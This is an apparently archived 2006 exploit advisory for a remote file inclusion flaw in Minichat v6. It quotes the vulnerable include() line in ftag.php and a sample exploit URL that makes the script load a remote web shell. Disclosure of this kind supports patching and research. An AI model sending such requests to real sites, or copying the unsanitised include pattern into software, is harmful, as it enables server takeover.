Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities

n@board <= 3.1.9e (naboard_pnr. php) Remote File Include Vulnerability

SH-News (RFI)

Download-Engine Remote File Include

From:	los_misfits_(at)_hotmail.com <los_misfits_(at)_hotmail.com>
Date:	12.10.2006
Subject:	Exploits Minichat v6 Remote File Include

#################################################################################
##############################

    Minichat v6 Remote File Include
#################################################################################
##############################

Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox
Contact. ...............: los_misfits[at]hotmail.com

#################################################################################
##############################
Download Software:

http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivo
s)/Minichat%20v6.0%20-%20Con%20instalador.zip

#################################################################################
##############################
Affected File:

ftag.php

#################################################################################
##############################

Code vulnerable:

<? include($_GET['mostrar']); ?>


#################################################################################
##############################


Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

#################################################################################
##############################

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team